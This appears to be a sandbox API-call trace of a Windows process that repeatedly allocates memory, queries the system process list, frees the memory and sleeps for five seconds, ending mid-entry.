[0229.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 